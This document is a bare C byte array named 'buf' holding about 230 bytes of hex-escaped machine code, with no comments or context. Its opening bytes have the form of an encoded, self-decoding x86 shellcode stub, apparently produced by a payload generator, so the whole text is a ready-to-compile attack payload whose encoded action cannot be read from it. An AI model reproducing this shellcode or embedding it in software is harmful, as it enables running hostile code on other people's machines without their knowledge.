unsigned char buf[] = 
"\xda\xda\xbb\x4d\x64\x1e\x84\xd9\x74\x24\xf4\x58\x2b\xc9"
"\xb1\x31\x31\x58\x17\x03\x58\x17\x83\x8d\x60\xfc\x71\xf1"
"\x81\x82\x7a\x09\x52\xe3\xf3\xec\x63\x23\x67\x65\xd3\x93"
"\xe3\x2b\xd8\x58\xa1\xdf\x6b\x2c\x6e\xd0\xdc\x9b\x48\xdf"
"\xdd\xb0\xa9\x7e\x5e\xcb\xfd\xa0\x5f\x04\xf0\xa1\x98\x79"
"\xf9\xf3\x71\xf5\xac\xe3\xf6\x43\x6d\x88\x45\x45\xf5\x6d"
"\x1d\x64\xd4\x20\x15\x3f\xf6\xc3\xfa\x4b\xbf\xdb\x1f\x71"
"\x09\x50\xeb\x0d\x88\xb0\x25\xed\x27\xfd\x89\x1c\x39\x3a"
"\x2d\xff\x4c\x32\x4d\x82\x56\x81\x2f\x58\xd2\x11\x97\x2b"
"\x44\xfd\x29\xff\x13\x76\x25\xb4\x50\xd0\x2a\x4b\xb4\x6b"
"\x56\xc0\x3b\xbb\xde\x92\x1f\x1f\xba\x41\x01\x06\x66\x27"
"\x3e\x58\xc9\x98\x9a\x13\xe4\xcd\x96\x7e\x63\x13\x24\x05"
"\xc1\x13\x36\x05\x76\x7c\x07\x8e\x19\xfb\x98\x45\x5e\xf3"
"\xd2\xc7\xf7\x9c\xba\x92\x45\xc1\x3c\x49\x89\xfc\xbe\x7b"
"\x72\xfb\xdf\x0e\x77\x47\x58\xe3\x05\xd8\x0d\x03\xb9\xd9"
"\x07\x60\x50\x42\x86\x03\xd2\xef\xd6";
